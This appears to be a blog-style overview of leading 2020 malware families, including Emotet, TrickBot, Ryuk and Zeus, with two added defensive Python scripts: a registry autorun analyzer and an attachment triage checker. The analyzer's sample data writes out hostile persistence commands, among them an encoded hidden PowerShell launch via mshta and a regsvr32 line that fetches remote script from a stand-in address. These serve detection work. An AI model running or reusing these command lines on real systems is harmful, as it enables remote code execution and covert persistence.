Introduction: The upsurge of malware
Malware remains a favorite tool of cybercriminals, and a number of malware families have made the news as the cause of data theft and high-profile privacy breaches.
According to Malwarebytes Labs’ 2020 State of Malware Report, “the Trojan-turned-botnets Emotet and TrickBot [re-coded to work as malware loaders] made a return in 2019 to terrorize organizations alongside new ransomware families, such as Ryuk, Sodinokibi, and Phobos.” Emotet, TrickBot and Ryuk are frequently chained together in the same intrusion, especially against financial organizations. SamSam, by contrast, is typically deployed by hand after the attackers gain entry through an exploited service or brute-forced remote-access credentials.
According to the Center for Internet Security, the list of the most prolific malware last year included ZeuS (aka Zbot, a banking Trojan), Kovter (a pervasive click-fraud Trojan) and Dridex (a well-known banking Trojan). Malspam — spam email that delivers malware — was the primary infection vector.
Top malware to watch in 2020
Here are this year’s biggest malware threats on the internet:
Emotet is currently the most dangerous, costly and destructive malware in circulation. It “functions as a downloader or dropper of other banking trojans,” per the Center for Internet Security (CIS). It spreads through phishing emails and can infect an entire network quickly: once it compromises a mailbox, it harvests the victim’s contacts and existing email threads and uses them to send convincing malicious messages to new targets.
Kovter is a malware family that appeared in 2014 but has changed its skin several times. It began as police-themed ransomware, tricking users into believing they were being fined by law enforcement. It then reappeared as click-fraud malware, using code injection to generate fraudulent ad clicks and report back to its operators. Later it resurfaced as fileless malware, storing its payload in the registry and launching it through autorun entries, and it has since been delivered in several phishing campaigns.
Today, Kovter ranks among the most prolific malware of the past few years. It is commonly distributed as an email attachment which, once opened, runs shellcode that installs the malware on the target.
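The fileless persistence described above (a payload kept in the registry and started from an autorun entry) leaves a footprint that is easy to hunt for: Run/RunOnce values that invoke script hosts or other living-off-the-land binaries, carry inline script, or have meaningless names. The following is an added example, not code from the page or from any vendor report; it parses a constructed `reg export`-style dump (the entries are invented for illustration, not a real capture) and flags entries with Kovter-like traits. The rule set is illustrative and would need tuning against a real baseline.

```python
"""Flag suspicious autorun registry entries of the kind fileless malware installs.

Added example, not from the original page. The input is a constructed .reg
export; the heuristics are illustrative assumptions, not a vendor signature.
"""
import re

# Constructed sample in `reg export` format (not a real capture).
SAMPLE_REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"4f3a1c"="mshta \"javascript:close(new ActiveXObject('WScript.Shell').Run('powershell -nop -w hidden -enc SQBFAFgAIAAo',0,true))\""
"Updater"="regsvr32 /s /n /u /i:http://203.0.113.5/a.sct scrobj.dll"
"Spotify"="C:\\Users\\alice\\AppData\\Roaming\\Spotify\\Spotify.exe --autostart"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="%windir%\\system32\\SecurityHealthSystray.exe"
"svchost"="wscript.exe //E:jscript \"C:\\ProgramData\\a1b2\\x.txt\""
'''

# "name"="data" lines; backslash-escaped quotes and backslashes are allowed inside.
ENTRY_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"\s*$')
# Script hosts and proxy-execution binaries commonly abused from autorun keys.
LOLBIN_RE = re.compile(
    r'\b(mshta|powershell|pwsh|wscript|cscript|regsvr32|rundll32|certutil|bitsadmin)(\.exe)?\b',
    re.I)
# Substrings that indicate inline or remotely fetched script rather than a plain program path.
SCRIPT_MARKERS = ('javascript:', 'vbscript:', 'activexobject', '-enc',
                  '/i:http', 'iex(', 'frombase64string')
# A script host pointed at a file whose extension is not a script type.
DISGUISED_SCRIPT_RE = re.compile(r'\b[wc]script(\.exe)?\b.*\.(txt|dat|log|tmp|ini)\b', re.I)
HEX_NAME_RE = re.compile(r'^[0-9a-f]{4,}$', re.I)
MAX_VALUE_LEN = 400  # assumption: legitimate Run values are short program paths


def _unescape(s):
    """Undo the .reg escaping of backslashes and double quotes."""
    return re.sub(r'\\(["\\])', r'\1', s)


def parse_reg_export(text):
    """Return a list of (key_path, value_name, value_data) for string values."""
    entries, key = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith('[') and line.endswith(']'):
            key = line[1:-1]
            continue
        m = ENTRY_RE.match(line)
        if key and m:
            entries.append((key, _unescape(m.group(1)), _unescape(m.group(2))))
    return entries


def analyze_entry(name, value):
    """Return the list of reasons an autorun value looks suspicious (empty if clean)."""
    reasons = []
    lolbins = sorted({m.group(1).lower() for m in LOLBIN_RE.finditer(value)})
    if lolbins:
        reasons.append('lolbin:' + ','.join(lolbins))
    low = value.lower()
    markers = [mk for mk in SCRIPT_MARKERS if mk in low]
    if markers:
        reasons.append('inline_script:' + ','.join(markers))
    if DISGUISED_SCRIPT_RE.search(value):
        reasons.append('script_host_nonscript_file')
    # Random hex, non-ASCII or unprintable value names are typical of fileless loaders.
    if HEX_NAME_RE.match(name) or not name.isascii() or not name.isprintable():
        reasons.append('odd_value_name')
    if len(value) > MAX_VALUE_LEN:
        reasons.append('oversized_value')
    return reasons


def analyze_reg_export(text):
    """Return one finding per suspicious entry: key, value name and reasons."""
    findings = []
    for key, name, value in parse_reg_export(text):
        reasons = analyze_entry(name, value)
        if reasons:
            findings.append({'key': key, 'name': name, 'reasons': reasons})
    return findings


if __name__ == '__main__':
    for f in analyze_reg_export(SAMPLE_REG_EXPORT):
        print(f"{f['key']}\\{f['name']}: {', '.join(f['reasons'])}")
```

On a live host the same logic can be fed the output of `reg export HKCU\Software\Microsoft\Windows\CurrentVersion\Run run.reg` (and the HKLM and RunOnce equivalents); the value names and payload shapes used in the sample are assumptions for the sake of the demonstration, not indicators taken from a real Kovter sample.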
Ryuk is a prevalent ransomware that is often dropped on a system by other malware (e.g., TrickBot) and can be extremely costly and destructive. It uses a combination of RSA and AES encryption with a unique key for each executable, so a decryptor obtained for one victim is useless for another. Ryuk campaigns have targeted large organizations and government agencies for high ransoms.
Zeus, the most widespread banking malware, is distributed primarily via spam or phishing campaigns (or drive-by downloads). Using keystroke logging and form grabbing, attackers steal banking credentials from users of compromised systems.
It is not a recent Trojan: it was first identified in 2007, during an attack on the US Department of Transportation. However, it did its greatest damage two years later, when it was used against Cisco, Amazon, Oracle and Bank of America.
Presently, the Zeus botnet is believed to be one of the most pervasive and damaging banking Trojan variants to date. Because its source code leaked in 2011 and can easily be enhanced or modified for new attacks, Zeus lives on today, and “many other malware variants have adopted parts of its codebase.”
Dridex is another banking Trojan, also known as Bugat or Cridex. It targets financial information via phishing and malspam, harvesting credentials that allow unauthorized transfers from victims’ bank accounts. In 2019, this malware hit numerous countries, resulting in both data and monetary loss.
The Dridex botnet first appeared in 2012 and by 2015 had become one of the most prevalent financial Trojans. According to US-CERT Alert AA19-339A, Dridex has re-emerged with new tactics: it is now used as an implant early in the infection chain, followed by the BitPaymer and DoppelPaymer ransomware, and small and medium-sized organizations are particularly at risk.
The malware and its various iterations have become infamous for personalized, targeted attacks on the financial services sector, hitting both banking institutions and their customers, according to the Department of Homeland Security. It has also been used alongside ransomware in attacks on a number of online financial operations, where users who downloaded Dridex onto their systems were subsequently hit with ransomware.
TrickBot is one of the more recent banking Trojans targeting Windows machines and has already been updated several times to become ever more effective at stealing personal data and banking credentials. Over the last couple of years it has improved its ability to hide itself and evade detection. It now spreads in multiple ways: not only via phishing but also as a secondary payload and across connected, infected systems (a corporate network, for example), as reflected in the steady volume of detections throughout 2019 noted in the Malwarebytes Labs 2020 State of Malware Report.
A typical attack starts with an email that links to a file hosted on Google Docs. Users are led to believe the document is a PDF, but the file is actually an executable. Once run, it shows a fake error message saying the file is not available, while the malware installs itself undisturbed in the background.
“Since inception in late 2016, the TrickBot banking trojan has continually undergone updates and changes in attempts to stay one step ahead of defenders and internet security providers,” writes Webroot. “The TrickBot authors continue to target various financial institutions across the world, using MS17-010 exploits in an attempt to successfully laterally move throughout a victim’s network.” This makes it a serious risk for businesses.
Malware is going strong and threatening our systems more and more. According to the AV-TEST Institute, over 15 million new pieces of malware are spotted every month. But which types are actually being used the most and are expected to plague the internet in 2020?
Ransomware keeps evolving. Lately, malicious actors are not only encrypting victims’ files and demanding money to unlock them; they are also threatening to expose stolen sensitive data if the victim does not pay promptly. Maze ransomware (operated by the group tracked as TA2101) is an example of such an attack. It was used against security staffing firm Allied Universal and, when the ransom was not paid, the attackers published 10% of the stolen files. As Binary Defense noted: “The threat actors reached out directly to Bleeping Computer, informing them of the infection and details on what happened.”
Trojans remain a modern threat. Trojans like Emotet continue to endanger businesses because of their persistence and the ease with which they propagate across a network. Lately, they have been distributed mainly through macro-enabled documents of common types (such as Word and Excel files).
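Two of the delivery tricks on this page, the TrickBot "PDF" that is really an executable and the macro-enabled Office documents that carry Emotet, can both be caught before anything is opened by comparing what a file's name claims with what its bytes are. The following is an added example, not code from the page or from any of the cited vendors: it sniffs the real type from magic bytes (a PE starts with `MZ`, an Office Open XML document is a zip whose macro project lives in `vbaProject.bin`), checks for double extensions, and reports a verdict. All sample files are constructed in memory for the demonstration.

```python
"""Triage an email attachment or download by comparing its name with its bytes.

Added example, not from the original page. The samples are constructed in
memory; the extension lists are assumptions chosen for illustration.
"""
import io
import zipfile

EXEC_EXTS = {'.exe', '.scr', '.com', '.pif', '.js', '.jse', '.vbs', '.hta', '.lnk'}
MACRO_EXTS = {'.docm', '.xlsm', '.pptm', '.dotm', '.xltm'}
DOC_EXTS = {'.pdf', '.rtf', '.txt', '.docx', '.xlsx', '.pptx'} | MACRO_EXTS


def sniff(data):
    """Identify the real file type from its leading bytes, not its name."""
    if data.startswith(b'MZ'):
        return 'pe'                       # Windows executable / DLL
    if data.startswith(b'%PDF-'):
        return 'pdf'
    if data.startswith(b'PK\x03\x04'):    # zip container (Office Open XML is a zip)
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as z:
                names = z.namelist()
        except zipfile.BadZipFile:
            return 'zip-corrupt'
        if any(n.lower().endswith('vbaproject.bin') for n in names):
            return 'ooxml-macro'          # VBA project present: macro-enabled document
        if '[Content_Types].xml' in names:
            return 'ooxml'
        return 'zip'
    return 'unknown'


def extensions(filename):
    """All extensions in order, e.g. 'Invoice.pdf.exe' -> ['.pdf', '.exe']."""
    parts = filename.lower().rsplit('/', 1)[-1].split('.')
    return ['.' + p for p in parts[1:]]


def triage(filename, data):
    """Return declared vs. actual type and a list of verdict strings."""
    exts = extensions(filename)
    declared = exts[-1] if exts else ''
    actual = sniff(data)
    verdicts = []
    # "Report.pdf.exe": a document extension hidden in front of an executable one.
    if len(exts) > 1 and declared in EXEC_EXTS and any(e in DOC_EXTS for e in exts[:-1]):
        verdicts.append('double_extension')
    if actual == 'pe':
        if declared in EXEC_EXTS:
            verdicts.append('executable_attachment')
        elif declared in DOC_EXTS:
            verdicts.append('executable_disguised_as_document')
        else:
            verdicts.append('executable_with_misleading_extension')
    if actual == 'ooxml-macro':
        verdicts.append('macro_enabled_document')
        if declared not in MACRO_EXTS:
            verdicts.append('macro_under_nonmacro_extension')
    return {'file': filename, 'declared': declared, 'actual': actual, 'verdicts': verdicts}


def build_ooxml(with_macro):
    """Construct a minimal Office Open XML container, optionally with a VBA project."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w', zipfile.ZIP_DEFLATED) as z:
        z.writestr('[Content_Types].xml', '<Types/>')
        z.writestr('word/document.xml', '<w:document/>')
        if with_macro:
            # Real vbaProject.bin is an OLE compound file; the header is enough here.
            z.writestr('word/vbaProject.bin', b'\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1' + b'\x00' * 16)
    return buf.getvalue()


# Constructed samples (not real malware): a PE stub named as a PDF, a double
# extension, a macro-enabled document, a clean document and a real PDF header.
SAMPLES = {
    'Statement.pdf': b'MZ' + b'\x90' * 62,
    'Invoice.pdf.exe': b'MZ' + b'\x90' * 62,
    'Invoice.docm': build_ooxml(with_macro=True),
    'Agenda.docx': build_ooxml(with_macro=False),
    'Report.pdf': b'%PDF-1.4\n%constructed sample\n',
}


def triage_all(samples=SAMPLES):
    """Map each sample name to its verdict list."""
    return {name: triage(name, data)['verdicts'] for name, data in samples.items()}


if __name__ == '__main__':
    for name, verdicts in triage_all().items():
        print(f'{name}: {verdicts or ["clean"]}')
```

The check is deliberately independent of whatever the mail client or browser displays: the TrickBot lure works precisely because the user trusts the name and icon, so the verdict has to come from the bytes. A `macro_enabled_document` verdict is not proof of malice on its own, but for attachments arriving from outside the organization it is the condition under which the Emotet-style lures on this page succeed, and it is a reasonable trigger for quarantine or sandbox detonation.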
Fileless malware attacks will also become more commonplace in 2020, and Malwarebytes Labs observed a growing number of exploit kits in fall 2019. Organized crime groups are also expanding their operations to include fileless techniques to ensure their attacks succeed; Kovter (click fraud) and WannaMine (cryptomining) are examples of fileless malware that are causing an increasing number of infections.
Conclusion and recommendations
New malicious programs are recorded every day. A surprising number of malware attacks succeed because end users have not installed security software (antivirus, anti-spyware and/or anti-malware) to keep their computer or mobile device safe from today’s threats. Awareness, however, remains one of the most effective weapons against malware.
Be alert to malicious campaigns, especially this year, with the flood of emails and articles related to the COVID-19 pandemic and the US elections. Being able to recognize danger and act appropriately at the user level is paramount.
Sources
- Malware explained: How to prevent, detect and recover from it, CSO
- All about malware, Malwarebytes
- 2020 State of Malware Report, Malwarebytes Labs
- Malware Threat Insights, Reason Labs
- Who Made the List of 2019’s Nastiest Malware?, Dark Reading
- These were the worst malware strains of 2019, TechRadar
- 3 Malware Trends to Watch Out for in 2020, Tripwire, Inc.
- These Are The Top Windows And Mac Malware Threats For 2020…, Forbes
- 2019 Online Malware and Threats: A Profile of Today’s Security Posture, Dark Reading
- Top 10 Malware December 2019, Center for Internet Security
- Top 10: Most Dangerous Malware That Can Empty Your Bank Account, Heimdal Security
- Is ‘REvil’ the New GandCrab Ransomware?, Krebs on Security
- Emotet revisited: pervasive threat still a danger to businesses, Malwarebytes
- Stalkerware and mobile advertising Trojans rank as top mobile threats, Kaspersky Lab
- 15 (CRAZY) Malware and Virus Statistics, Trends & Facts 2020, SafetyDetective
- Zeus Virus AKA Zbot – Malware of the Month, November 2019, Security Boulevard
- Dridex — Malware of the Month, December 2019, Security Boulevard
- MS-ISAC Security Primer: Emotet, Center for Internet Security
- Ransomware-as-a-Service (RaaS): How It Works, Tripwire, Inc.
- Malware Most Foul: Emotet, Trickbot, Cryptocurrency Miners, BankInfoSecurity.com
- Mobile malware evolution 2019, Kaspersky Lab
- TrickBot Banking Trojan Adapts with New Module, Webroot Inc.